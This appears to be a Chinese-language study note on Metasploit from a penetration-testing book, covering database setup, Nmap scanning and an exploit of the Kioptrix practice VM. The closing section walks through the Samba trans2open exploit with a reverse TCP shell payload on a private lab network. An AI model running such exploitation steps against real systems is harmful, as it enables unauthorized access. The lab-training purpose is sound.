本系列文章来自《高度安全环境下的高级渗透测试》一书学习笔记
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
2009年10月21号,漏洞管理解决公司Rapid7收购Metasploit项目。Rapid7承诺成立专职开发团队,仍然将源代码置于3段式BSD许可证下。
——百度百科

在线教程:
​​​https://www.offensive-security.com/metasploit-unleashed/​

更新Metasploit

msfupdate

Metasploit和数据库
Metasploit可以将所有的结果导入到数据库中
下面是安装postgre

apt-get install postgresql -y
sudo su postgres -c psql
postgres=# ALTER USER postgres WITH PASSWORD 'mypassword'
postgres=# \q

msfconsole
msf> db_connect postgres:mypassword@127.0.0.1/pentester
msf> db_status
msf> hosts

(没能安装成功postgre,抽时间再仔细看看)

在Metasploit里调用Nmap进行扫描
在执行hosts命令地,为了获得输出显示,我们可以使用Nmap进行快速扫描以收集一些数据。在msfconsole已启动并和数据库已经连接的情况下,可以在Metasploit里直接进行Nmap扫描。

msf> db_nmap -nO -sTU -pT:22,80,111,139,443,32768,U:111,137,32768 192.168.75.14

输出结果会自动被添加到数据库以方便以后的检索。
现在运行hosts命令,可以看到目标系统已经添加到了PostgreSQL数据库中。

msf> hosts
msf> services -p 443

使用辅助模块

msf> use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp)> show options
msf auxiliary(tcp)> set RHOSTS 192.168.75.14
RHOSTS设置为需要扫描的目标
msf auxiliary(tcp)> set PORTS 1-1024
端口范围
msf auxiliary(tcp)> run
启动扫描任务

使用Metasploit对Kioptrix进行漏洞利用

msfconsole
msf> db_connect postgres:mypassword@127.0.0.1/pentester
msf> services
msf> search samba
msf> us exploit/linux/samba/trans2open
msf exploit(trans2open) > info
msf> set RHOST 192.168.75.14
msf> show payloads
msf> set payload linux/x86/shell/reverse_tcp
msf> set LHOST 192.168.75.12
msf> set LPORT 2222
exploit
msf exploit(trans2open) > exploit
# mail
# 1